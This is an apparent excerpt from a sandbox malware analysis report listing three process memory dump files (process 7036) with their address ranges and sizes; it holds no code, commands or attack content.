                                                                                                                                                                                                                                                • memory/7036-823-0x0000000005F80000-0x0000000005F9A000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  104KB

                                                                                                                                                                                                                                                • memory/7036-824-0x0000000005FD0000-0x0000000005FF2000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                • memory/7036-822-0x0000000006D30000-0x0000000006DC6000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  600KB